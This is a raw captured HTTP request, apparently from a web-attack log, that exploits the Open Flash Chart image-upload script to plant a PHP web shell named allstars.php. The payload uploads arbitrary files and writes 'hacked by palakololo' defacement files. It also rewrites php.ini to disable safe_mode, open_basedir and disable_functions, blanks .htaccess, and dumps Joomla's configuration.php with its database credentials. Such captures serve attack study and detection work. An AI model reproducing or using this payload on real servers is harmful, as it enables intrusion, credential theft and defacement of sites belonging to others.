POST /~tysko/webattacks.2013.08administrator/components/com_civicrm/civicrm/packages/OpenFlashchart/php-ofc-library/ofc_upload_image.php?name=allstars.php HTTP/1.0
Host: oucsace.cs.ohiou.edu
Content-Length: 1706
Content-type: text/plain
echo '^_^';
echo '';
echo '';
echo 'x:'.php_uname().'
';
echo '
';
if( $_POST['_upl'] == "U" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'S
'; }
else { echo 'G
'; }
}
echo 'T35 v.01';
echo 'Powered by CodeX
';
echo 'Made in Indonesian - Gorontalo';
echo '';
if(isset($_GET['x'])){
@error_reporting(E_ALL ^ E_NOTICE);
$zoneh_contents = "hacked by palakololo";
$zoneh_file =@fopen ('$_SERVER["DOCUMENT_ROOT"]/x.txt','w');
fwrite($zoneh_file ,$zoneh_contents);
}
@error_reporting(E_ALL ^ E_NOTICE);
$zoneh_contents = "hacked by palakololo";
$zoneh_file =@fopen ('x.txt','w');
fwrite($zoneh_file ,$zoneh_contents);
@error_reporting(E_ALL ^ E_NOTICE);
$phpini_contents = "safe_mode = Off\nsafe_mode_gid = Off\nsafe_mode_include_dir =\nsafe_mode_exec_dir =\nopen_basedir =\ndisable_functions =\ndisable_classes =\nfile_uploads = On\nallow_url_fopen = On";
$phpini_file =@fopen ('php.ini','w');
fwrite($phpini_file ,$phpini_contents);
@error_reporting(E_ALL ^ E_NOTICE);
$htaccess_contents = "";
$htaccess_file =@fopen ('.htaccess','w');
fwrite($htaccess_file ,$htaccess_contents);
if(isset($_GET['x'])){
$source = "x.txt";
$gorontalo =$_SERVER['DOCUMENT_ROOT']."/x.txt";
rename($source, $gorontalo);
}
elseif(isset($_GET['joomla'])){
$codex =$_SERVER['DOCUMENT_ROOT']."/configuration.php";
$joomla = file_get_contents($codex);
echo $joomla;
}
?>